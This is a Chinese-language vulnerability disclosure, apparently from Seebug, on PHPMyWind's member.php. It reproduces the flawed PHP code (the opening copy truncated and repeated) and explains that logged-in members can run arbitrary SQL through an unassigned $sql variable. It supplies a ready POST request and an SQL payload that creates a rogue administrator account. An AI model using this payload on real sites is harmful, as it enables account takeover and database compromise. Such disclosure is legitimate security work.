### 简要描述: rt ### 详细说明: PHPMyWind最新版 只需会员登录 即可进行任意sql操作 漏洞代码: /member.php 861-941行 ``` else if($a == 'perfect') { //初始化参数 $username = empty($username) ? '' : $username; $password = empty($password) ? '' : md5(md5($password)); $repassword = empty($repassword) ? '' : md5(md5($repassword)); $email = empty($email) ? '' : $email; //验证输入数据 if($username == '' or $password == '' or $repassword == '' or $email == '') { header('location:?c=perfect'); exit(); } if($password != $repassword) { header('location:?c=perfect'); exit(); } $uname_len = strlen($username); $upwd_len = strlen($_POST['password']); if($uname_len<6 or $uname_len>16 or $upwd_len<6 or $upwd_len>16) { header('location:?c=perfect'); exit(); } if(preg_match("/[^0-9a-zA-Z_@!\.-]/",$username) or preg_match("/[^0-9a-zA-Z_-]/",$password) or !preg_match("/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)+$/", $email)) { header('location:?c=perfect'); exit(); } $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `username`='$username'");...
### 简要描述: rt ### 详细说明: PHPMyWind最新版 只需会员登录 即可进行任意sql操作 漏洞代码: /member.php 861-941行 ``` else if($a == 'perfect') { //初始化参数 $username = empty($username) ? '' : $username; $password = empty($password) ? '' : md5(md5($password)); $repassword = empty($repassword) ? '' : md5(md5($repassword)); $email = empty($email) ? '' : $email; //验证输入数据 if($username == '' or $password == '' or $repassword == '' or $email == '') { header('location:?c=perfect'); exit(); } if($password != $repassword) { header('location:?c=perfect'); exit(); } $uname_len = strlen($username); $upwd_len = strlen($_POST['password']); if($uname_len<6 or $uname_len>16 or $upwd_len<6 or $upwd_len>16) { header('location:?c=perfect'); exit(); } if(preg_match("/[^0-9a-zA-Z_@!\.-]/",$username) or preg_match("/[^0-9a-zA-Z_-]/",$password) or !preg_match("/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)+$/", $email)) { header('location:?c=perfect'); exit(); } $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `username`='$username'"); if(isset($r['id'])) { ShowMsg('用户名已存在!','-1'); exit(); } $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `email`='$email'"); if(isset($r['id'])) { ShowMsg('您填写的邮箱已被注册!','-1'); exit(); } //添加用户数据 $regtime = time(); $regip = GetIP(); if(check_app_login('qq')) { $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'"); if(isset($r['id'])) ShowMsg('该QQ已与其他账号绑定!','-1'); else $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')"; } else if(check_app_login('weibo')) { $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'"); if(isset($r['id'])) ShowMsg('该微博已与其他账号绑定!','-1'); else $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')"; } $dosql->ExecNoneQuery($sql); ``` 主要代码 ``` if(check_app_login('qq')) { $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'"); if(isset($r['id'])) ShowMsg('该QQ已与其他账号绑定!','-1'); else $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')"; } else if(check_app_login('weibo')) { $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'"); if(isset($r['id'])) ShowMsg('该微博已与其他账号绑定!','-1'); else $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')"; } $dosql->ExecNoneQuery($sql); ``` $sql 在if else if中才赋值 只需不进入2个条件即可 最后执行 很简单 完全操控所以语句 ### 漏洞证明: 利用起来也很简单 注册个用户登录后发个如下的包即可 POST /phpmywind/member.php?a=perfect DATA username=123123123x&password=123123123&repassword=123123123&email=12312@qq.com&sql=xxxxx username email 不是注册过的就行 随便乱填 [<img src="https://images.seebug.org/upload/201505/29181857ac9571535f1ec602f50222d151a99eac.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/29181857ac9571535f1ec602f50222d151a99eac.jpg) [<img src="https://images.seebug.org/upload/201505/2918190845405e089dd8a5f0671b19b5a5a3ef4a.jpg" alt="22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/2918190845405e089dd8a5f0671b19b5a5a3ef4a.jpg) sql改成 insert into pmw_admin (`username`,`password`) values ((123456),md5(123456)) 即可创建一个 123456 密码123456的管理员账户
